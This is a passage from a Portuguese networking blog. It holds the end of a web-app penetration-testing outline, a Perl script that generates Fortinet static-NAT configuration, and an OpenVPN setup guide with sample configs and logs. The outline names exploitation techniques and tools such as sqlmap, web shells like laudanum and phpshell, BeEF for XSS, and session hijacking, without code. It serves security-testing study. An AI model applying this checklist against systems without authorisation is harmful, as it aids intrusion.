  • Manual checks (info leak, dir browsing, username, comm. Inject, sql inject, xss, csrf)
  • Client-side
    • AJAX (logic, api, data, sprajax, ratproxy)
    • Web Services (WSDL, UDDI, SOAP, ext. entity, xpath)
    • Flash (ratproxy, crossdomain, flare, swfscan, swfintruder)
    • Java (class, jad)
    • PHP

Exploitation

  • auth bypass
  • injection (sql, command, code, csrf, xss, response splitting)
    • sql (sqlmap, phpshell, ajaxshell, laudanum)
    • xss (post to get, evasion, durzosploit, attackAPI, beef)
    • limiting (client+java, client+pen, server+target, server+pen, pen infra)
  • session (hijack, fixation, xsrf, monkeyfist)

Referências
Certification:GWAPT
SANS

30/03/2012

Criação de NATs estáticos no Fortinet

Filed under: fortinet — drak @ 9:03 PM

O artigo abaixo foi contribuído pelo meu amigo Ricardo “Dexter”.

Diferente da maioria dos firewalls no Fortinet ao criar um NAT IP_PUBLICO -> IP_REAL_INTERNO o mesmo não cria a associação inversa, ou seja, o fato de criar um NAT 200.200.200.200 -> 10.10.10.10 não significa que o quando o endereço 10.10.10.10 sair para a Internet ele fará a tradução para o IP 200.200.200.200; para que essa asociação ocorra deve ser criado um NAT na Central NAT, uma tabela de NATs parecida com a tabela do Checkpoint para NATs estáticos.

O script automatiza as linhas de configuração necessárias para a criação do NAT nos dois sentidos (VIP e Central NAT). Deve-se fornecer como argumento uma tabela de enderecos válidos seguido do endereço real no formato abaixo, colocar essas informações em um arquivo chamado lista.txt na mesma pasta do script.

200.200.200.200 10.10.10.10
200.200.200.201 10.10.10.11
200.200.200.202 10.10.10.12

É importante lembrar que caso existam outros NATs no equipamento deve-se altera o valor da variável $ivc visto que tabela de Central NAT associa os NATs a IDs, a variável $ivc (id valor contador) deve ser ser alterada de 1 para o ultimo id utilizado.

#!/usr/bin/perl

# Interface voltada para Internet Alterar essa variavel
$interfExt = "port16" ;

# Alterar o nome do arquivo com a relação "IP_NATEADO IP_REAL"
open(DATA, "<lista.txt");
$ivc = 1 ;
while(<DATA>)
{
my($line) = $_;
chomp($line);
($ipext, $ipint) = split (/ /, $line);
printf "config firewall vip                   \n";
printf "    edit \"VIP_$ipext\"               \n";
printf "        set extip \"$ipext\"          \n";
printf "        set extintf \"$interfExt\"    \n";
printf "        set mappedip $ipint           \n";
printf "    next                              \n";
printf "end                                   \n";
printf "                                      \n";
printf "config firewall address               \n";
printf "    edit \"$ipint\"                   \n";
printf "     set subnet $ipint 255.255.255.255\n";
printf "    next                              \n";
printf "end                                   \n";
printf "                                      \n";
printf "config firewall ippool                \n";
printf "    edit \"$ipext\"                   \n";
printf "        set endip $ipext              \n";
printf "        set startip $ipext            \n";
printf "    next                              \n";
printf "end                                   \n";
printf "                                      \n";
printf "                                      \n";
printf "config firewall central-nat           \n";
printf "    edit $ivc                         \n";
printf "        set orig-addr \"$ipint\"      \n";
printf "        set nat-ippool \"$ipext\"     \n";
printf "        set orig-port 1               \n";
printf "        set nat-port 1-65535          \n";
printf "    next                              \n";
printf "end                                \n \n";
$ivc++;
}

30/11/2011

Configurando o OpenVPN

Filed under: vpn — drak @ 10:25 PM

Segue abaixo um guia para instalação do OpenVPN para prover acesso remoto via VPN client-to-site, agradeço ao comedor voraz de picanha que me deu de bandeja esse tutorial.

Instalar o OpenVPN versão 2.2.0 ou superior pois tem melhores recursos e estabilidade;
Após instalação, copiar a pasta /usr/share/doc/openvpn-2.2.0/easy-rsa/2.0 para /etc/openvpn/easy-rsa
Editar os campos do arquivo /etc/openvpn/easy-rsa/vars

export KEY_COUNTRY="BR"
export KEY_PROVINCE="SP"
export KEY_CITY="CIDADE"
export KEY_ORG="ORGANIZACAO"
export KEY_EMAIL="root@localhost"

Na pasta /etc/openvpn/easy-rsa digitar os comandos:

source ./vars # Executa arquivo vars
./clean-all # Limpa todas as chaves
./pkitool --initca => # Cria CA
./pkitool --server server => # Cria certificado do servidor
cd keys
cp server.crt server.key ca.crt dh1024.pem ../../

5) Para criar o certificado para os clientes, use os comandos:

cd /etc/openvpn/easy-rsa
source ./vars
./build-key nome_do_usuario

Responda todas as perguntas e coloque uma senha

Configure o arquivo /etc/openvpn/server.conf, exemplo abaixo:

#################################################
# Sample OpenVPN 2.0 config file for            #
# multi-client server.                          #
#               				#
# This file is for the server side              #
# of a many-clients  one-server              #
# OpenVPN configuration.                        #
#               				#
# OpenVPN also supports                         #
# single-machine  single-machine             #
# configurations (See the Examples page         #
# on the web site for more info).               #
#               				#
# This config should work on Windows            #
# or Linux/BSD systems.  Remember on            #
# Windows to quote pathnames and use            #
# double backslashes, e.g.:                     #
# "C:\\Program Files\\OpenVPN\\config\\foo.key" #
#               				#
# Comments are preceded with '#' or ';'         #
#################################################

# Which local IP address should OpenVPN
# listen on? (optional)
;local a.b.c.d

# Which TCP/UDP port should OpenVPN listen on?
# If you want to run multiple OpenVPN instances
# on the same machine, use a different port
# number for each one.  You will need to
# open up this port on your firewall.
port 1194

# TCP or UDP server?
proto tcp
;proto udp

# "dev tun" will create a routed IP tunnel,
# "dev tap" will create an ethernet tunnel.
# Use "dev tap0" if you are ethernet bridging
# and have precreated a tap0 virtual interface
# and bridged it with your ethernet interface.
# If you want to control access policies
# over the VPN, you must create firewall
# rules for the the TUN/TAP interface.
# On non-Windows systems, you can give
# an explicit unit number, such as tun0.
# On Windows, use "dev-node" for this.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
dev tap
;dev tun

# Windows needs the TAP-Win32 adapter name
# from the Network Connections panel if you
# have more than one.  On XP SP2 or higher,
# you may need to selectively disable the
# Windows firewall for the TAP adapter.
# Non-Windows systems usually don't need this.
;dev-node MyTap

# SSL/TLS root certificate (ca), certificate
# (cert), and private key (key).  Each client
# and the server must have their own cert and
# key file.  The server and all clients will
# use the same ca file.
#
# See the "easy-rsa" directory for a series
# of scripts for generating RSA certificates
# and private keys.  Remember to use
# a unique Common Name for the server
# and each of the client certificates.
#
# Any X509 key management system can be used.
# OpenVPN can also use a PKCS #12 formatted key file
# (see "pkcs12" directive in man page).
ca ca.crt
cert server.crt
key server.key  # This file should be kept secret

# Diffie hellman parameters.
# Generate your own with:
#   openssl dhparam -out dh1024.pem 1024
# Substitute 2048 for 1024 if you are using
# 2048 bit keys.
dh dh1024.pem

# Configure server mode and supply a VPN subnet
# for OpenVPN to draw client addresses from.
# The server will take 10.8.0.1 for itself,
# the rest will be made available to clients.
# Each client will be able to reach the server
# on 10.8.0.1. Comment this line out if you are
# ethernet bridging. See the man page for more info.
server 10.8.0.1 255.255.255.0

# Maintain a record of client  virtual IP address
# associations in this file.  If OpenVPN goes down or
# is restarted, reconnecting clients can be assigned
# the same virtual IP address from the pool that was
# previously assigned.
ifconfig-pool-persist ipp.txt

# Configure server mode for ethernet bridging.
# You must first use your OS's bridging capability
# to bridge the TAP interface with the ethernet
# NIC interface.  Then you must manually set the
# IP/netmask on the bridge interface, here we
# assume 10.8.0.4/255.255.255.0.  Finally we
# must set aside an IP range in this subnet
# (start=10.8.0.50 end=10.8.0.100) to allocate
# to connecting clients.  Leave this line commented
# out unless you are ethernet bridging.
;server-bridge 10.8.0.4 255.255.255.0 10.8.0.50 10.8.0.100

# Configure server mode for ethernet bridging
# using a DHCP-proxy, where clients talk
# to the OpenVPN server-side DHCP server
# to receive their IP address allocation
# and DNS server addresses.  You must first use
# your OS's bridging capability to bridge the TAP
# interface with the ethernet NIC interface.
# Note: this mode only works on clients (such as
# Windows), where the client-side TAP adapter is
# bound to a DHCP client.
;server-bridge

# Push routes to the client to allow it
# to reach other private subnets behind
# the server.  Remember that these
# private subnets will also need
# to know to route the OpenVPN client
# address pool (10.8.0.0/255.255.255.0)
# back to the OpenVPN server.
push "route 192.168.0.0 255.255.0.0"

# To assign specific IP addresses to specific
# clients or if a connecting client has a private
# subnet behind it that should also have VPN access,
# use the subdirectory "ccd" for client-specific
# configuration files (see man page for more info).

# EXAMPLE: Suppose the client
# having the certificate common name "Thelonious"
# also has a small subnet behind his connecting
# machine, such as 192.168.40.128/255.255.255.248.
# First, uncomment out these lines:
;client-config-dir ccd
;route 192.168.40.128 255.255.255.248
# Then create a file ccd/Thelonious with this line:
#   iroute 192.168.40.128 255.255.255.248
# This will allow Thelonious' private subnet to
# access the VPN.  This example will only work
# if you are routing, not bridging, i.e. you are
# using "dev tun" and "server" directives.

# EXAMPLE: Suppose you want to give
# Thelonious a fixed VPN IP address of 10.9.0.1.
# First uncomment out these lines:
;client-config-dir ccd
;route 10.9.0.0 255.255.255.252
# Then add this line to ccd/Thelonious:
#   ifconfig-push 10.9.0.1 10.9.0.2

# Suppose that you want to enable different
# firewall access policies for different groups
# of clients.  There are two methods:
# (1) Run multiple OpenVPN daemons, one for each
#     group, and firewall the TUN/TAP interface
#     for each group/daemon appropriately.
# (2) (Advanced) Create a script to dynamically
#     modify the firewall in response to access
#     from different clients.  See man
#     page for more info on learn-address script.
;learn-address ./script

# If enabled, this directive will configure
# all clients to redirect their default
# network gateway through the VPN, causing
# all IP traffic such as web browsing and
# and DNS lookups to go through the VPN
# (The OpenVPN server machine may need to NAT
# or bridge the TUN/TAP interface to the internet
# in order for this to work properly).
;push "redirect-gateway def1 bypass-dhcp"

# Certain Windows-specific network settings
# can be pushed to clients, such as DNS
# or WINS server addresses.  CAVEAT:
# http://openvpn.net/faq.html#dhcpcaveats
# The addresses below refer to the public
# DNS servers provided by opendns.com.
;push "dhcp-option DNS 208.67.222.222"
;push "dhcp-option DNS 208.67.220.220"

# Uncomment this directive to allow different
# clients to be able to "see" each other.
# By default, clients will only see the server.
# To force clients to only see the server, you
# will also need to appropriately firewall the
# server's TUN/TAP interface.
;client-to-client

# Uncomment this directive if multiple clients
# might connect with the same certificate/key
# files or common names.  This is recommended
# only for testing purposes.  For production use,
# each client should have its own certificate/key
# pair.
#
# IF YOU HAVE NOT GENERATED INDIVIDUAL
# CERTIFICATE/KEY PAIRS FOR EACH CLIENT,
# EACH HAVING ITS OWN UNIQUE "COMMON NAME",
# UNCOMMENT THIS LINE OUT.
;duplicate-cn

# The keepalive directive causes ping-like
# messages to be sent back and forth over
# the link so that each side knows when
# the other side has gone down.
# Ping every 10 seconds, assume that remote
# peer is down if no ping received during
# a 120 second time period.
keepalive 10 120

# For extra security beyond that provided
# by SSL/TLS, create an "HMAC firewall"
# to help block DoS attacks and UDP port flooding.
#
# Generate with:
#   openvpn --genkey --secret ta.key
#
# The server and each client must have
# a copy of this key.
# The second parameter should be '0'
# on the server and '1' on the clients.
;tls-auth ta.key 0 # This file is secret

# Select a cryptographic cipher.
# This config item must be copied to
# the client config file as well.
;cipher BF-CBC        # Blowfish (default)
;cipher AES-128-CBC   # AES
;cipher DES-EDE3-CBC  # Triple-DES

# Enable compression on the VPN link.
# If you enable it here, you must also
# enable it in the client config file.
comp-lzo

# The maximum number of concurrently connected
# clients we want to allow.
;max-clients 100

# It's a good idea to reduce the OpenVPN
# daemon's privileges after initialization.
#
# You can uncomment this out on
# non-Windows systems.
;user nobody
;group nobody

# The persist options will try to avoid
# accessing certain resources on restart
# that may no longer be accessible because
# of the privilege downgrade.
persist-key
persist-tun

# Output a short status file showing
# current connections, truncated
# and rewritten every minute.
status openvpn-status.log

# By default, log messages will go to the syslog (or
# on Windows, if running as a service, they will go to
# the "\Program Files\OpenVPN\log" directory).
# Use log or log-append to override this default.
# "log" will truncate the log file on OpenVPN startup,
# while "log-append" will append to it.  Use one
# or the other (but not both).
;log         openvpn.log
;log-append  openvpn.log

# Set the appropriate level of log
# file verbosity.
#
# 0 is silent, except for fatal errors
# 4 is reasonable for general usage
# 5 and 6 can help to debug connection problems
# 9 is extremely verbose
verb 3

# Silence repeating messages.  At most 20
# sequential messages of the same message
# category will be output to the log.
;mute 20

Suba o serviço de OpenVPN no servidor:

service openvpn start

Configure um cliente:
Instale o software openvpn (http://swupdate.openvpn.org/community/releases/openvpn-2.2.1-install.exe)
Copie os arquivos ca.crt, .crt e .key para a pasta config dentro da instalação do OpenVPN.
Crie o arquivo de configuração server.ovpn com o conteúdo:

client
dev tap
route-method exe
route-delay 2
proto tcp
remote 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert nome_do_usuario.crt
key nome_do_usuario.key
comp-lzo
verb 3

Inicie o serviço do OpenVPN no icone que aparecerá ao lado do relógio em seu desktop.

Como referência segue como deve ser um log de conexão feita com sucesso tanto do lado do servidor quanto do cliente:


# SERVER SIDE LOGS (/var/log/messages)
Nov 10 19:56:28 linux_server openvpn[31445]: MULTI: multi_create_instance called
Nov 10 19:56:28 linux_server openvpn[31445]: Re-using SSL/TLS context
Nov 10 19:56:28 linux_server openvpn[31445]: LZO compression initialized
Nov 10 19:56:28 linux_server openvpn[31445]: Control Channel MTU parms [ L:1576 D:140 EF:40 EB:0 ET:0 EL:0 ]
Nov 10 19:56:28 linux_server openvpn[31445]: Data Channel MTU parms [ L:1576 D:1450 EF:44 EB:135 ET:32 EL:0 AF:3/1 ]
Nov 10 19:56:28 linux_server openvpn[31445]: Local Options hash (VER=V4): '3e6d1056'
Nov 10 19:56:28 linux_server openvpn[31445]: Expected Remote Options hash (VER=V4): '31fdf004'
Nov 10 19:56:28 linux_server openvpn[31445]: TCP connection established with 192.168.1.150:12229
Nov 10 19:56:28 linux_server openvpn[31445]: TCPv4_SERVER link local: [undef]
Nov 10 19:56:28 linux_server openvpn[31445]: TCPv4_SERVER link remote: 192.168.1.150:12229
Nov 10 19:56:28 linux_server openvpn[31445]: 192.168.1.150:12229 TLS: Initial packet from 192.168.1.150:12229, sid=0c93e40e 445e3be2
Nov 10 19:56:28 linux_server openvpn[31445]: 192.168.1.150:12229 VERIFY OK: depth=1, /C=BR/ST=UF/L=Cidade/O=Organization/CN=Organization_CA/emailAddress=root@localhost
Nov 10 19:56:28 linux_server openvpn[31445]: 192.168.1.150:12229 VERIFY OK: depth=0, /C=BR/ST=UF/L=Cidade/O=Organization/CN=johndoe/emailAddress=root@localhost
Nov 10 19:56:29 linux_server openvpn[31445]: 192.168.1.150:12229 Data Channel Encrypt: Cipher 'BF-CBC' initialized with 128 bit key
Nov 10 19:56:29 linux_server openvpn[31445]: 192.168.1.150:12229 Data Channel Encrypt: Using 160 bit message hash 'SHA1' for HMAC authentication
Nov 10 19:56:29 linux_server openvpn[31445]: 192.168.1.150:12229 Data Channel Decrypt: Cipher 'BF-CBC' initialized with 128 bit key
Nov 10 19:56:29 linux_server openvpn[31445]: 192.168.1.150:12229 Data Channel Decrypt: Using 160 bit message hash 'SHA1' for HMAC authentication
Nov 10 19:56:29 linux_server openvpn[31445]: 192.168.1.150:12229 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 1024 bit RSA
Nov 10 19:56:29 linux_server openvpn[31445]: 192.168.1.150:12229 [johndoe] Peer Connection Initiated with 192.168.1.150:12229
Nov 10 19:56:31 linux_server openvpn[31445]: johndoe/192.168.1.150:12229 PUSH: Received control message: 'PUSH_REQUEST'
Nov 10 19:56:31 linux_server openvpn[31445]: johndoe/192.168.1.150:12229 SENT CONTROL [johndoe]: 'PUSH_REPLY,route 192.168.0.0 255.255.0.0,route-gateway 198.51.100.1,ping 10,ping-restart 120,ifconfig 198.51.100.3 255.255.255.0,push-continuation 1' (status=1)
Nov 10 19:56:31 linux_server openvpn[31445]: johndoe/192.168.1.150:12229 MULTI: Learn: 00:ff:3c:84:94:c7 -> johndoe/192.168.1.150:12229

# CLIENT SIDE LOGS (OpenVPN client logs)
Thu Nov 10 19:56:28 2011 OpenVPN 2.2.1 Win32-MSVC++ [SSL] [LZO2] built on Jul 1 2011
Thu Nov 10 19:56:28 2011 WARNING: No server certificate verification method has been enabled. See http://openvpn.net/howto.html#mitm for more info.
Thu Nov 10 19:56:28 2011 NOTE: OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables
Thu Nov 10 19:56:28 2011 LZO compression initialized
Thu Nov 10 19:56:28 2011 Control Channel MTU parms [ L:1576 D:140 EF:40 EB:0 ET:0 EL:0 ]
Thu Nov 10 19:56:28 2011 Socket Buffers: R=[8192->8192] S=[8192->8192]
Thu Nov 10 19:56:28 2011 Data Channel MTU parms [ L:1576 D:1450 EF:44 EB:135 ET:32 EL:0 AF:3/1 ]
Thu Nov 10 19:56:28 2011 Local Options hash (VER=V4): '31fdf004'
Thu Nov 10 19:56:28 2011 Expected Remote Options hash (VER=V4): '3e6d1056'
Thu Nov 10 19:56:28 2011 Attempting to establish TCP connection with 200.10.10.10:1194
Thu Nov 10 19:56:28 2011 TCP connection established with 200.10.10.10:1194
Thu Nov 10 19:56:28 2011 TCPv4_CLIENT link local: [undef]
Thu Nov 10 19:56:28 2011 TCPv4_CLIENT link remote: 200.10.10.10:1194
Thu Nov 10 19:56:28 2011 TLS: Initial packet from 200.10.10.10:1194, sid=a2f0489d e1545cc7
Thu Nov 10 19:56:28 2011 VERIFY OK: depth=1, /C=BR/ST=UF/L=Cidade/O=Organization/CN=Organization_CA/emailAddress=root@localhost
Thu Nov 10 19:56:28 2011 VERIFY OK: depth=0, /C=BR/ST=UF/L=Cidade/O=Organization/CN=server/emailAddress=root@localhost
Thu Nov 10 19:56:29 2011 Data Channel Encrypt: Cipher 'BF-CBC' initialized with 128 bit key
Thu Nov 10 19:56:29 2011 Data Channel Encrypt: Using 160 bit message hash 'SHA1' for HMAC authentication
Thu Nov 10 19:56:29 2011 Data Channel Decrypt: Cipher 'BF-CBC' initialized with 128 bit key
Thu Nov 10 19:56:29 2011 Data Channel Decrypt: Using 160 bit message hash 'SHA1' for HMAC authentication
Thu Nov 10 19:56:29 2011 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 1024 bit RSA
Thu Nov 10 19:56:29 2011 [server] Peer Connection Initiated with 200.10.10.10:1194
Thu Nov 10 19:56:31 2011 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
Thu Nov 10 19:56:31 2011 PUSH: Received control message: 'PUSH_REPLY,route 192.168.0.0 255.255.0.0,route-gateway 198.51.100.1,ping 10,ping-restart 120,ifconfig 198.51.100.3 255.255.255.0,push-continuation 1'
Thu Nov 10 19:56:31 2011 OPTIONS IMPORT: timers and/or timeouts modified
Thu Nov 10 19:56:31 2011 OPTIONS IMPORT: --ifconfig/up options modified
Thu Nov 10 19:56:31 2011 OPTIONS IMPORT: route options modified
Thu Nov 10 19:56:31 2011 OPTIONS IMPORT: route-related options modified
Thu Nov 10 19:56:31 2011 ROUTE default_gateway=172.16.0.1
Thu Nov 10 19:56:31 2011 TAP-WIN32 device [Local Area Connection 2] opened: \\.\Global\{3C8494C7-498F-46A5-8535-D2C81ABB148E}.tap
Thu Nov 10 19:56:31 2011 TAP-Win32 Driver Version 9.8
Thu Nov 10 19:56:31 2011 TAP-Win32 MTU=1500
Thu Nov 10 19:56:31 2011 Notified TAP-Win32 driver to set a DHCP IP/netmask of 198.51.100.3/255.255.255.0 on interface {3C8494C7-498F-46A5-8535-D2C81ABB148E} [DHCP-serv: 198.51.100.0, lease-time: 31536000]
Thu Nov 10 19:56:31 2011 Successful ARP Flush on interface [37] {3C8494C7-498F-46A5-8535-D2C81ABB148E}
Thu Nov 10 19:56:33 2011 TEST ROUTES: 98/98 succeeded len=98 ret=1 a=0 u/d=up
Thu Nov 10 19:56:33 2011 C:\WINDOWS\system32\route.exe ADD 192.168.0.0 MASK 255.255.0.0 198.51.100.1
OK!
Thu Nov 10 19:56:33 2011 Initialization Sequence Completed

« Página anteriorPróxima Página »

Blog no WordPress.com.